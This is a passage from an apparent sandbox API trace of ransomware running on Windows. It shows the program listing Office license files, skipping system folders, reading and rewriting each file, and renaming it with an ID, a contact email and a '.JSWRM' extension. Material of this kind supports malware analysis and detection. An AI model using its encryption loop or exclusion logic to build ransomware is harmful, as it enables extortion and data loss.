lpOverlapped=0x0) returned 1 [0111.237] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.237] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.237] CloseHandle (hObject=0x45c) returned 1 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0111.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0111.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0111.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0111.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0111.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.238] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.239] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd54d20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebd54d20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebe5fd79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="VIB9AF~1.XRM")) returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.239] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0111.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0111.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0111.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0111.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0111.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0111.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0111.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0111.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0111.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0111.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0111.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0111.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.240] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11203) returned 1 [0111.240] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0111.240] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0111.252] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.252] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0111.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.252] CloseHandle (hObject=0x45c) returned 1 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0111.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0111.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0111.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0111.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0111.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.254] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd2eac2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebd2eac2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebe138d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51fb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="VID362~1.XRM")) returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.254] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0111.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0111.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0111.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0111.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0111.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.255] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20987) returned 1 [0111.255] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51f0) returned 0x24c1d0 [0111.255] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51f0, lpOverlapped=0x0) returned 1 [0111.266] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.267] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51f0, lpOverlapped=0x0) returned 1 [0111.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.267] CloseHandle (hObject=0x45c) returned 1 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0111.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0111.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0111.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0111.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0111.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.267] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0111.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0111.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0111.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.269] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebcbc3cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebcbc3cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebded68f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="VID47F~1.XRM")) returned 1 [0111.269] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.269] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.269] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.269] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.269] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.270] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.270] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.270] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.270] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.270] lstrcmpiW (lpString1="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0111.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0111.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0111.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 